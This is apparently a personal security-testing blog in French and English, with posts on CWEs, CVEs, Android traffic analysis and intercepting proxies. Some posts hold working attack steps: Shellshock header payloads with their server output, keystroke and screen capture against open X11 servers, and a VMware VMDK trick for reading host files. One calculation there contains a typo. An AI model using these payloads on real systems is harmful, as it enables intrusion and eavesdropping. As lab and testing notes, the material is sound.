17 Jan 2016

Vulnérabilités communes à tester manuellement | CWEs to test manually

Vulnérabilités qui ne sont pas (toujours) bien détectées de façon automatique, qui nécessitent un test manuel (après le balayage).
Vulnerabilities that that scanners don't (always) find reliably, that warrant a manual test
  • CWE-285 Improper Access Control (Authorization)
  • CWE-306 Missing Authentication for Critical Function
  • CWE-311 Missing Encryption of Sensitive Data [A06]
  • CWE-352 Cross-Site Request Forgery (CSRF) [A08]
  • CWE-434 Unrestricted Upload of File with Dangerous Type
  • CWE-798 Use of Hard-coded Credentials  
Top 10 (2013)
  • A02 Broken Authentication and Session  Management
  • A04 Insecure Direct Object References 
  • A05 Security Misconfiguration
  • A06 Sensitive Data Exposure
  • A08 Cross-Site Request Forgery (CSRF)
  • A10 Unvalidated Redirects and Forwards
Celles qui son moins applicable or vérifiables. | Those that are less applicable (everywhere) or testable via black-box methods:
  • CWE-494 Download of Code Without Integrity Check
  • CWE-732 Incorrect Permission Assignment for Critical Resource
  • CWE-754 Improper Check for Unusual or Exceptional Conditions
  • CWE-770 Allocation of Resources Without Limits or Throttling 
  • CWE-807 Reliance on Untrusted Inputs in a Security Decision
  • [...]
Évidemment, cette liste est plutôt générique. On doit faire des choix selon le contexte, valider les problèmes relevés par les balayeurs (identifier les faux positifs, augmenter la sévérité/priorité selon l'exposition), essayer d'exploiter les certaines vulnérabilités récentes, essayer des nouvelles techniques, etc.

Of course, this is just a generic list. We still need to adapt our approach based on context, validate findings from scanners (identify false positives, adjust severity/priority based on exposure), try to exploit new vulns, try new techniqeus, etc.

10 Jan 2016

CVEs importants qui ont impactés nos web apps | Important CVEs that have impacted our web apps

Une liste non-exhaustive des CVEs qui ont eu un impact important et généralisé sur la sécurité de nos applications web.
A list of important CVEs that have had a great general impact on our web app security.

FREAK - CVE-2015-0204

SSL/TLS vulnerability that allows an attacker to intercept HTTPS connections between vulnerable clients and servers and force them to use weakened encryption, which the attacker can break to steal or manipulate sensitive data.

Resources:

LOGJAM - CVE-2015-4000

The TLS protocol 1.2 and earlier, when a DHE_EXPORT ciphersuite is enabled on a server but not on a client, does not properly convey a DHE_EXPORT choice, which allows man-in-the-middle attackers to conduct cipher-downgrade attacks by rewriting a ClientHello with DHE replaced by DHE_EXPORT and then rewriting a ServerHello with DHE_EXPORT replaced by DHE.

Resources:

WinShock - CVE-2014-6321 - MS14-066

Schannel in Microsoft Windows Server allows remote attackers to execute arbitrary code via crafted packets.

Resources:

ShellShock (BashBug) - CVE-2014-6271

GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution.

Resources:
Padding Oracle On Downgraded Legacy Encryption (POODLE). The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which makes it easier for man-in-the-middle attackers to obtain cleartext data via a padding-oracle attack.

Resources:

Heartbleed - CVE-2014-0160

The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c.
Resources:

Others worth mentioning



      References

      Brèches et Menaces 2015 | Threat & Breach Reports 2015


      27 Jan 2015

      Sélection d'applications Android | Choosing Android Apps

      Quelques idées de critères de sélection d'applications Android:
      1. Rechercher des applications soit en utilisant Google Play et en examinant les privilèges détaillés (Permissions: View Details) ou rechercher par permissions (critère: permission "INTERNET / Full network access" exclus) via le site IzzyOnDroid.
      2. L'application ne doit pas demander plus de privilèges que nécessaire
      3. Lorsque possible, l'application ne doit pas combiner la lecture de données personnelles (incluant fichiers, comptes Google, numéro de téléphone...) et l'accès réseau (full network access) à moins que l'auteur de l'application soit une source autoritaire (Google, Firefox...)
      4. Lorsque l'application a un besoin légitime de connecter vers l'Internet, elle ne doit pas avoir démontré des signes de fuites de données personnelles (ex.: connection vers des addresses inconnues), de surveillance (ex.: flurry.com) ou annonces publicitaires (ex.: admob.com). J'utilise NoRoot Firewall sur un appareil de test pendant un certain temps, je relève la liste de connections (addresses IP ou domaines) et j'arrive à ma propre conclusion. Pour investiguer des addresses IP, utilise une ressource comme robtex.com.
      5. L'application doit bien fonctionner, selon les besoins (rapide, efficace, lisible, adaptable). Payer pour avoir ce qu'on a vraiment besoin.
      Here's a criteria for selecting Android apps from the Google Play Store:
      • Search for apps in the Google Play Store and view the detailed permissions (Permissions: View Details) or search by permissions (criteria: Permission "INTERNET / Full Network Access" excluded) using the IzzyOnDroid site. 
      • Check that the app does not require more privileges than necessary.
      • When possible, the app should not combine the reading of personal data (files, Google accounts, telephone number...) and Internet access (full network access) unless it comes from an authoritative source (that is somewhat trusted) such as Google, Firefox, etc.
      • When the app has a legitimate need to connect to the Internet, it should not have exhibited signs of personal (or business) data leakage by connecting to unknown sites/domains, by connecting to monitoring sites (e.g. flurry.com) or advertising sites (e.g. admob.com). I utilize NoRoot Firewall on a test device for a certain time, I pull-up the list of connections and then I make my own conclusion. For target hosts that I only have the IP address for, I use robtex.com to investigate it further.
      • The application must function real well, as per my needs (fast, efficient, readable, adaptable). I much prefer to pay for an app that works as I want. Unfortunately, there aren't that many that fall outside of the Google realm and that meet the above criteria.

      3 Jan 2015

      Analyse de fuites sous Android | Data leakage analysis for Android

      Voici quelques idées d'approches pour analyser les connections réseau que nos applications Android essaient d'initier, sans avoir besoin de "rooter" l'appareil. Outils mentionnés: Android Connection Monitor (historique de connexions), NoRoot Firewall, (historique de connexions et contrôle du traffic sortant) tcpdump, tshark (historique des réponses DNS) et Robtex (analyse de réputation et des rôles des systèmes hôtes).

      On peut considérer la méthode décrite ici-bas comme une première partie, pour identifier quelle application spécifique se connecte à quel serveur. En deuxième lieu, on devra analyser le traffic détaillé via des techniques conventionnelles telles qu'avec Wireshark, un proxy d'interception SSL comme mitmproxy, etc. Ce qui n'est pas couvert ici (encore) mais cet article donne une très bonne idée..
      Below, I propose a few ideas to analyze network connections initiated by Android Apps, without the need to root the device. Tools mentioned: Android Connection Monitor (connection logs) NoRoot Firewall (connection logs, egress traffic control) tcpdump, tshark (DNS response logs) and Robtex (host reputation/purpose analysis).
      We should consider the method described below as a first step, to identify which specific app connects to which server. Secondly, we would need to analyze the traffic details by using tools such as Wireshark, an interception proxy such as  mitmproxy, etc. This it not covered here (yet) but this post gives very good ideas.

      Connection Monitor

      Démarrer Connection Monitor  |  Start Connection Monitor

      Installer Connection Manager sur l'appareil Android à partir de Google Play et démarrer l'application et sélectionner l'onglet Connections Log:
      Install Connection Manager on Android device from Google Play and start the app and select the Connections Log tab:


      Exporter l'historique des connections  |  Export Connection Logs

      Laisser l'application s'exécuter pendant un certain temps et exporter les données en sélectionnant l'onglet Settings et en choisissant la fonction Export Database and Send:
      Let the app run for a while and then export its data by selecting the Settings tab and by pressing Export Database and Send:


      NoRoot Firewall

      Démarrer NoRoot Firewall  |  Start NoRoot Firewall

      Installer NoRoot Firewall (de Greyshirts) à partir de Google Play.
      Install NoRoot Firewall from Google Play.

      Démarrer l'application NoRoot Firewall et presser sur Start et configurer pour exécution automatique lors de démarrage en activant Auto start on boot:
      Start NoRoot Firewall and press Start and configure to Auto start on Boot:

      Configurer NoRoot Firewall  |  Configure NoRoot Firewall

      Configurer les accès pour chaque application dans NoRoot Firewall via l'onglet "Pending Access" et en sélectionnant une application (ne pas presser sur Allow ou Deny):

      Configure access for each app in NoRoot Firewall by configuring each app under the Pending Access tab and by selecting each app (but don't press on Allow or Deny):



      Accepter ou rejeter chaque accès granulaire selon votre bon sens (accès minimum nécessaires) ou en faisant une recherche sur un site tel que Robtex ou SANS ISC.
      Accept or reject each granular network access based on your common sense (minimum access) and/or by researching via sites such as Robtex or SANS ISC.



      Après quelques répétitions, configurer des règles généralisées (mais conserver quelques répétitions):
      After a few repetitions for the same domains/subnets, configure a generalized rule (but keep the repetitions for future analysis):



      Répéter pour toutes les applications installées, de façon itérative, sous utilisation normale de tous les jours. Éventuellement, la plupart des applications seront configurée telles que voulues, permettant le traffic qu'on veut bien laisser passer, vers les domaines appropriés.

      Repeat for all installed apps iteratively, as a result of normal daily usage. Eventually, most of your apps will have been configured as needed, allowing traffic to pass or not, based on domain names and your own research.


      Les paragraphes qui suivent permettent d'extraire la configuration the NoRoot Firewall et de la visualiser à partir d'un PC (ou même de la transférer vers un autre appareil).
      The following paragraphs will allow you to extract the NoRoot Firewall configuration in order to view it on a PC (or even transfer it to another Android device).

      Faire une copie de sauvegarde vers PC  |  Backup data to PC

      Activer le mode USB debugging sur l'appareil Android:

      Turn on USB debugging on Android device:

      Connecter d'un PC vers l'appareil en utilisant adb et un cable USB (exemple avec Mac). Faire une copie de sauvegarde des données de NoRoot Firewall. Sur l'appareil, presser OK:
      Connect a PC to an Android via USB and use adb. Make a backup of the NoRoot Firewall data:
      (macos)$ adb backup -f norootfw.ab app.greyshirts.firewall
      Now unlock your device and confirm the backup operation.
       


      Extraire les règles de NoRoot Firewall  |  Extract rules from NoRoot Firewall
      Télécharger Android Backup Extractor. Ensuite, extraire les fichiers du fichier de sauvegarde.
      Download  Android Backup Extractor. Then, extract the files from the backup.
      (macos)$ java -jar abe.jar unpack norootfw.ab norootfw.tar
      Strong AES encryption not allowed
      Magic: ANDROID BACKUP
      Version: 3
      Compressed: 1
      Algorithm: none

      203264 bytes written to norootfw.tar.
      (macos)$ tar xvf norootfw.tar
      x apps/app.greyshirts.firewall/_manifest
      x apps/app.greyshirts.firewall/f/persistentlog.txt
      x apps/app.greyshirts.firewall/db/db-journal
      x apps/app.greyshirts.firewall/db/db
      x apps/app.greyshirts.firewall/sp/PREF.xml
      Extraire les données de la BD de NoRoot Firewall avec sqlite3:
      Extracting data from the NoRoot Firewall database with sqlite3:
      $ cd apps/app.greyshirts.firewall/db
      $ sqlite3 db
      SQLite version 3.7.13 2012-07-17 17:46:21
      Enter ".help" for instructions
      Enter SQL statements terminated with a ";"
      sqlite> .schema
      CREATE TABLE android_metadata (locale TEXT);
      CREATE TABLE app (appName TEXT, pkg1Name TEXT, appType INTEGER, _id INTEGER PRIMARY KEY AUTOINCREMENT );
      CREATE TABLE filter (serverIp TEXT, serverStrType INTEGER, serverPort INTEGER, protocol INTEGER, serverName TEXT, createdData INTEGER, type INTEGER DEFAULT 0, type1 INTEGER DEFAULT 0, appName TEXT, pkgName TEXT, pkg2Name TEXT, pkg3Name TEXT, isPolicy INTEGER, appUid INTEGER, priority INTEGER DEFAULT 0, _id INTEGER PRIMARY KEY AUTOINCREMENT );
      CREATE TABLE pending (serverIp TEXT, serverHost TEXT, serverPort INTEGER, localIp TEXT, localPort INTEGER, protocol INTEGER, serverName TEXT, createdData INTEGER, appName TEXT, allAppName TEXT, pkgName TEXT, pkg2Name TEXT, pkg3Name TEXT, appUid INTEGER, _id INTEGER PRIMARY KEY AUTOINCREMENT );
      CREATE INDEX filter_pkg1 ON filter(pkgName);
      CREATE INDEX filter_pkg2 ON filter(pkg2Name);
      CREATE INDEX filter_pkg3 ON filter(pkg3Name);
      CREATE INDEX pend_pkg1 ON pending(pkgName);
      CREATE INDEX pend_pkg2 ON pending(pkg2Name);
      CREATE INDEX pend_pkg3 ON pending(pkg3Name);


      sqlite> select appName,serverIp,serverPort from filter order by appName;
      Aldiko Premium|*|-1
      Aldiko Premium|static.86.130.76.144.clients.your-server.de|80
      Aldiko Premium|hit-block.opendns.com|443
      Android System|192.168.22.1|7
      Android System|*.cloudfront.net|80
      Android System|cache.google.com|80
      Android System|*|-1
      Calendar|*.1e100.net|443
      Calendar|64.233.*.*|443
      Calendar|64.233.171.95|443
      Calendar|qg-in-f95.1e100.net|443
      [...]


      sqlite> .output filter.txt
      sqlite> select appName,serverIp,serverPort from filter order by appName;


      sqlite> .output dump.sql
      sqlite> .dump

      Historique de résolution DNS  |  DNS Resolution History

      Liste complète des correspondances DNS  |  Full list of DNS mappings

      Si on veut obtenir une liste complète des réponses DNS obtenues sur le réseau, on peut utiliser tcpdump et tshark comme suit:
      If we need to obtain a full list of DNS name to IP address mappings, we can run tcpdump and let it collect this information and then get the mappings via tshark:
      (Linux OS) # tcpdump -n -i eth1 -w dns1.pcap port 53 &
      (attendre quelques heures  |  wait a few hours)
      (Linux OS) # tshark -nr dns1.pcap -Y "(dns.flags.response == 1) && (dns.qry.type == 1)" -T fields -e dns.qry.name -e dns.resp.addr | head

      Running as user "root" and group "root". This could be dangerous.
      nrdp.nccp.netflix.com    107.21.213.110
      myip.opendns.com    166.62.205.221
      googlemail.l.google.com    74.125.226.21,74.125.226.22
      nrdp.nccp.netflix.com    50.17.199.72
      www.jourzero.com    173.194.68.121
      nrdp.nccp.netflix.com    184.73.164.236
      www.jourzero.com    64.233.171.121
      myip.opendns.com    166.62.205.221
      nrdp.nccp.netflix.com    184.73.248.203
      cdn0.nflximg.net    24.200.246.83,24.200.246.57

      Analyse de réputation  |  Reputation Analysis 

      Robtex.com

      Le site robtex.com est est outil très utile qui fait l'aggrégation de données d'analyse provenant de différentes sources (whois, blacklists, DNS, multi-hosting...). Simplement en allant à la page principale, on peut initier une recherge qui nous amènera aux détails appropriés.

      On peut aussi utiliser des liens direct tels que : http://robtex.com/ip/8.8.8.8.html (IP address lookup) or http://robtex.com/dns/www.hp.com (FQDN lookup).
      For my needs, robtex.com has been a very useful tool for aggregating analysis data from various sources (whois, blacklists, DNS, multi-hosting...). Simply going to the main page and initiating a search from the top input form will get you what you need. 
      You can also use direct URIs such as : http://robtex.com/ip/8.8.8.8.html (IP address lookup) or http://robtex.com/dns/www.hp.com (FQDN lookup).

      There's also a nice little trick described below for getting colored links and details via hovering...

      Intégration vers Robtex  |  Integration to Robtex

      Lorsqu'on affiche nos résultats d'analyse, on peut intégrer ces résultats avec des données du service Robtex, tel que décrit ici. Ce qui permet d'avoir des liens actifs avec couleur, en fonction de la réputation. La section suivante montre un exemple.
      When printing our results to screen, we can use robtex as described here. This would allow active links to be shown with colors and hovering capabilities. The next section shows an example of this.

      Consolider les données  |  Putting it all together

      Bien sûr, il est possible de simplifier et d'automatiser une bonne partie des étapes décrites ci-haut. Pour l'instant, j'ai les résultats suivants obtenus via un peu de scriptage pour identifier des connections à investiguer possiblement...
      Surely, it's possible to simplify and automate some of the above. But for now, I've only performed a bit of scripting to output sample results for some connections to maybe look into...

      App NameHost NameIP AddressPort
      Aldiko Premiumwww.aldiko.co184.168.221.1980

      (probably data.flurry.com)216.52.203.13443

      (probably data.flurry.com)74.217.75.110443

      static.86.130.76.144.clients.your-server.de144.76.130.8680
      Google Play Newsstandbs.serving-sys.com
      80
      iSyncrec2-174-129-19-57.compute-1.amazonaws.com
      443


      NB: if the above IP addresses aren't colored or hovering doesn't work, it may be that the javascript from robtex.com is blocked locally (via something like noscript) or your client is being blacklisted temporarily by the service (i.e. if you're reloading this page too often). If this happens, try later.


      29 Sep 2014

      Current Intel on BashBug / Shellshock

      CVEs
      CVE-2014-6271  (1st bug report)
      http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271
      GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.

      CVE-2014-7169   (2nd bug/variant, aka AfterShock)
      http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7169
      GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271.

      CVE-2014-7186   (3rd bug/variant found by Redhat's Florian Weimer)
      http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7186
      The redirection implementation in parse.y in GNU Bash through 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via crafted use of here documents, aka the "redir_stack" issue.

      CVE-2014-7187    (4th bug/variant found by Redhat's Florian Weimer)
      http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7187
      Off-by-one error in the read_token_word function in parse.y in GNU Bash through 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via deeply nested for loops, aka the "word_lineno" issue.

      CVE-2014-6277   (5th bug/variant found by Google's Michael Zalewski)
      http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-627
      Variant 1. GNU Bash through 4.3 bash43-026 does not properly parse function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized memory access, and untrusted-pointer read and write operations) via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271 and CVE-2014-7169.

      CVE-2014-6278   (6th bug/variant found by Google's Michael Zalewski)
      http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6278   (reserved, not available yet)
      http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278
      Variant 2. (see Variant 1 CVE-2014-6277 for a description)

      From SANS Advisory Board: Only the first two listed above are patched in “main stream” linux distros. A source code patch is available for the rest if you want to compile bash yourself, but exploitation is a tad harder for the last 4.

      Other Info
      GNU Patch Info
      List for current bash (4.3): http://ftp.gnu.org/gnu/bash/bash-4.3-patches/
      Latest bash patch (027): http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-027

      Botnets

      Network Detection (IDS, IPS, WAF)
      • VRT and EmergingThreats posts showing this is being addressed for Snort
      • ...
      Exploits

      Bash Test Strings
      Command line tests to verify proper patching (and to somehow use in our detections):
      • Early patch: env x='() { :;}; echo Not patched' bash -c "echo This is a test."
      • Later patch: foo='() { echo Not patched; }' bash -c foo
      • (search for more...)

      25 Sep 2014

      Test pour Shellshock/BashBug | POC for ShellShock / BashBug CVE-2014-6271

      Ref CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271

      I tried real quick in a VM and it's easy to inject via user-agent and cookie headers. I didn't get much result though via a GET parameter though (either via URL-encoding or by just encoding spaces) but I just wanted to prove the point for myself quickly...


      Simple CGI Script on a vulnerable server

      /usr/lib/cgi-bin$ cat echo.sh
      #!/bin/bash
      echo -e "Content-type: text/plain\n\n"
      echo "hi ya! Is there a file in /tmp as a result of this?";
      echo "Output from env:"
      env



      GET request from attacker

      GET /cgi-bin/echo.sh HTTP/1.1
      Host: localhost
      Content-Length: 0
      User-Agent: () { :;}; echo Hacked > /tmp/HackedViaUserAgent
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Cookie: () { :;}; echo Hacked > /tmp/HackedViaCookie
      Connection: keep-alive




      GET response received by attacker

      HTTP/1.1 200 OK
      Date: Thu, 25 Sep 2014 23:42:53 GMT
      Server: Apache/2.2.16 (Debian)
      Vary: Accept-Encoding
      Content-Length: 1866
      Keep-Alive: timeout=15, max=100
      Connection: Keep-Alive
      Content-Type: text/plain

      hi ya! Is there a file in /tmp as a result of this?
      Output from env:
      [...]
      HTTP_USER_AGENT=() { :
      }
      HTTP_COOKIE=() { :
      }
      _=/usr/bin/env



      Result on attacked server

      $ ls /tmp/Hacked*
      /tmp/HackedViaCookie /tmp/HackedViaUserAgent

      1 May 2014

      Getting started in web services testing with SoapUI and Mutillidae


      J'ai écrit cet article pour aider quiconque qui désire commencer à utiliser SoapUI pour vérifier la sécurité de services web (SOAP). Pour ce faire, on commence par mettre en place Mutillidae qui contient quelques services à tester. Par la suite, on exécute un test d'injection SQL.

      Excusez l'anglais. Je n'ai pas vraiment le temps de le traduire.  Mais une image vaut mille mots, n'est-ce pas?
      ______________


       This post is meant to help a security tester with setting up SoapUI and use it against the test web services included in Mutillidae.

      Setting up a local test environment with web services

      Setting up SoapUI

      • Setup SoapUI and create a test project for Mutillidae and load the various Mutillidae WSDL files and setup the associated test suites for each WSDL:
      •  As a simple test, double click getUserInformation and add username and password values as follows: 


      •   Click on the green Submit Request button and wait for the response in the right pane:
       


        Creating a security test

      •   Create a new Security Test:













      • Optionally, add another specific assertion, as demonstrated below.

      Note that adding an XPath assertion for many injection issue testing may not be a good idea. At least, you have to ensure that the assertion will cover all the cases. For example, below, we add an XPath expression to cover the case of a normal request (node count = 1) and the case of an empty result set (node count = 0).







        Running the test


        Inspecting the results








      16 Dec 2013

      Acquérir la mémoire vive avec Dumpit.

      Acquérir la mémoire vive avec Dumpit.

      Acquiring memory with Dumpit

      http://isc.sans.edu/diary/Acquiring+Memory+Images+with+Dumpit/17216

      13 Nov 2013

      Proxy d'interception en mode "headless" | Headless intercepting proxy

      Voici les options utilisables que je connais pour intercepter du  traffic HTTP lorsque tout ce qu'on a est Kali Linux isolé (accédé via SSH sans aucune option d'accès X/VNC et sans accès Internet):
      Par exemple, on peut utilser le mode de défilement lors de la capture tout en sauvegardant les flots HTTP dans un fichier. Par la suite, on visionne les détails des flots en mode plein écran:
      # mitmdump -w /var/log/mitmdump-$$.log -v -p 8080
      192.168.2.109 GET http://www.jourzero.com/
          Host: www.jourzero.com
          User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:25.0) Gecko/20100101 Firefox/25.0
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
          Accept-Language: en-US,en;q=0.5
          Accept-Encoding: gzip, deflate
          DNT: 1
          Connection: keep-alive
          If-Modified-Since: Wed, 13 Nov 2013 17:27:42 GMT
          If-None-Match: "6f73caf0-aa84-4d81-a1e9-598d2369ecbc"

       << 304 Not Modified 0B

          Expires: Wed, 13 Nov 2013 17:30:43 GMT
          Date: Wed, 13 Nov 2013 17:30:43 GMT
          Cache-Control: private, max-age=0
          ETag: "6f73caf0-aa84-4d81-a1e9-598d2369ecbc"
          Server: GSE

      # mitmproxy -r /var/log/mitmdump-3099.log
      >> GET http://www.jourzero.com/
      ← 304 [empty content]
      ENTER

      2013-11-13 12:30:43 GET http://www.jourzero.com/
      ← 304 [empty content]
      Request                                   Response
      Host: www.jourzero.com
      User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:25.0) Gecko/20100101 Firefox/25.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      DNT: 1
      Connection: keep-alive
      If-Modified-Since: Wed, 13 Nov 2013 17:27:42 GMT
      If-None-Match: "6f73caf0-aa84-4d81-a1e9-598d2369ecbc"
      2013-11-13 12:30:43 GET http://www.jourzero.com/
                              ← 304 [empty content]
      TAB
      Request                                  Response
      Expires:        Wed, 13 Nov 2013 17:30:43 GMT
      Date:           Wed, 13 Nov 2013 17:30:43 GMT
      Cache-Control:  private, max-age=0 
      ETag:           "6f73caf0-aa84-4d81-a1e9-598d2369ecbc"
      Server:         GSE
                  


      Ces autres options offrent aussi un mode "headless" qui ne sont pas aussi simples à utiliser:
      • Zed Attack Proxy avec l'option "-daemon": zap.sh -daemon. Mon expérience dit qu'on doit savoir éditer les fichiers xml de configuration du proxy pour obtenir ce qu'on veut. Pas l'option la plus intéressante.
      • Burp avec l'option -Djava.awt.headless=true. Scripts qui utilisent cette option: sodapop.sh and bscan 
      • Proxystrike avec l'option -c (console) - pas certain si cette option est vraiment utilisable...
      • Metasploit socks4a auxiliary server:
      msf > use auxiliary/server/socks4a
      msf auxiliary(socks4a) > info

      Name: Socks4a Proxy Server
      Module: auxiliary/server/socks4a
      Version: 0
      License: Metasploit Framework License (BSD)
      Rank: Normal

      Provided by:
      sf

      Basic options:
      Name Current Setting Required Description
      ---- --------------- -------- -----------
      SRVHOST 0.0.0.0 yes The address to listen on
      SRVPORT 1080 yes The port to listen on.

      Description:
      This module provides a socks4a proxy server that uses the builtin
      Metasploit routing to relay connections.

      msf auxiliary(socks4a) > run
      [*] Auxiliary module execution completed

      [*] Starting the socks4a proxy server
      msf auxiliary(socks4a) > jobs

      Jobs
      ====

      Id Name
      -- ----
      0 Auxiliary: server/socks4a
       
      --
      Here are the usable options I know to intercept HTTP traffic in headless mode. I've had to use that on an isolated Kali Linux (accessed via SSH without possibility for X/VNC and without Internet download capability):
      There are other options on Kali but they are not as usable or simple to setup:

      12 Nov 2013

      Balayer des sites protégés contre les attaques CSRF

      Pour permettre le balayage de sites protégés contre les attaques de falsification de requêtes inter-site ou "Cross-Site Request Forgery" (CSRF), un plugiciel Burp a été développé (preuve de concept). Celui-ci peut être trouvé ici http://code.google.com/p/pysqlin/downloads/list.

      Tiré d'un article sur http://edge-security.blogspot.ca:
      In order to perform an automatic scan of CSRF-protected sites, requests must be performed sequentially as each requests contains a new generated anti-CSRF token needed for the next request, forming a token chain.

      A POC in the form of a Burp suite plugin has been developed to verify this approach, it can be downloaded at http://code.google.com/p/pysqlin/downloads/list. It should be noted however that this code is a POC and it requires further development in other to be able to work against real environments (any link of a webapp with this behavior is appreciated).

      Original post origin: http://edge-security.blogspot.ca.

      25 Jul 2013

      Conserver les "line-breaks" de HTML vers Excel (sans rangée additionnelle)

      Voici un problème fréquent: on veut importer un tableau HTML vers Excel sans que Excel interprète les tags de retour de chariot <BR> comme un changement de rangée - rendant impossible les fonctions d'ordonnancement et de filtration. Selon moi, le fait de pas avoir de flexibilité à cet égard à partir de l'interface usager de Excel est un bug!

      La solution la plus simple est d'ajouter un style spécifique à Microsoft (dans le fichier HTML) comme suit:

      <html>... <style> br { mso-data-placement:same-cell; } </style> ...</html>

      Merci à Michu (24/7 dev & coffee blog) pour le tuyau!

      Ref: Generating Excel files from web - line breaks in cells 

      Thanks to Michu for the great tip... Initial text copied here for convenience...

      Generating Excel files from web - line breaks in cells

      ...I needed to wrap text in cell, but when I put tag into HTML output, Excel interpreted it as a new row, not a line-break in existing cell. The solution I found is to add into a stylesheet:
          br {mso-data-placement:same-cell;}

      11 Jan 2013

      Attaque de serveur X11 sans authentification (après xhost +)

      Voici quelques commandes pour exploiter un serveur X11 ouvert:

      Capture de clés à distance (remote key capture)
      $ xkey IP:0.0

      NB:
      • Le code source pour xkey.c peut être trouvé ici
      • Utiliser 0.0 pour le port 6000, 1.0 pour le port 6001...
       
      Capture de l'écran (screen capture):
      $ xwd -display IP:0.0 -root -silent -out /tmp/screendump
      $ xv /tmp/screendump 
      $ xwd -display IP:0.0 -root -silent | xwdtopnm | pnmtopng > Screenshot.png


      Références:

      2 Dec 2012

      Analysis of Android app traffic through Burp Suite

      Good summary here

      Related articles

      23 Nov 2012

      Forcing Firefox to remember passwords

      The Firefox configuration setting wallet.crypto.autocompleteoverride  allows the override of the autocomplete="off" so that passwords are always remembered. This may be useful where Greasemonkey isn't available (i.e. on Android). I'll need to test this...

      Of course, this needs to be used with caution (on a test system, if Firefox isn't the default browser...).

      As said, on a desktop, a better option is to use a Greasemonkey script or modify the nsLoginManager.js file.

      Ref: Wallet.crypto.autocompleteoverride - MozillaZine Knowledge Base

      22 Oct 2012

      Stealing host data from a VMware vSphere 5.0 VM

      This post in inspired by the Insinuator site's presentation on an attack on public IaaS clouds (+ follow-up post) that support VM uploads and that are based on VMware ESXi 5.0. Essentially, it's about a VM guest being able to read files on the ESXi host after abusing a VMDK Descriptor File's content.

      I wanted to check if this is really a problem (i.e. the whole attack path being valid) or if this post was just something half-baked or simple "food for thought".

      Reproducing this in my own environment 

      Here, I'll try to reproduce what the above post did while checking that this is really a problem with VMware. I mean, this will only be a problem if exporting/importing the VM to/from OVF format works. In other words, if VMware performs clean-up/validation of while deploying OVF files, this alleged vulnerability may be irrelevant.

      Test Environment: ESXi  5.0.0 #1 SMP Release build-474610 Aug 26 2011 13:51:17 x86_64)

      Step 1: Simulate the stealing of the host's volume details from a Debian guest

      On ESXi host:
      • Connect to ESXi server using VMware vSphere Client 5.0
      • Create a small Debian 6.0.3 Server VM
      • SSH to ESXi hypervisor (SSH Server has to be turned on) - 
      Here we will work on the host's files directly instead of exporting them to a different format (ie: OVF, OVA...) and then reimporting them.
      • Edit resulting vmdk descriptor file (on the ESXi host directly). Added line in blue:
      /vmfs/volumes/4e5bfad0-283f8ee6-1b9d-b499ba04496a/Small and temporary VM for Eric # vi Small\ and\ temporary\ VM\ for\ Eric.vmdk
      # Disk DescriptorFile
      version=1
      encoding="UTF-8"
      CID=f7fc44b3
      parentCID=ffffffff
      isNativeSnapshot="no"
      createType="vmfs"

      # Extent description
      RW 2097152 VMFS "Small and temporary VM for Eric-flat.vmdk"
      RW 32 VMFS "/bootbank/state.tgz"[...]
      • Back in vSphere client, start the Debian VM
      • SSH to VM or use the vSphere Client to get into the VM's console
      • Multiply the VMFS size above by the block size of 512: 2097152 * 514 = 1073741824  (OFFSET)

      • Create new loopback device that points after the VMDK: losetup -v -o OFFSET -f /dev/sda 
      • Use loopback device to extract data: tar -x -i --ignore-command-error --ignore-failed-read -z -f /dev/loop0 
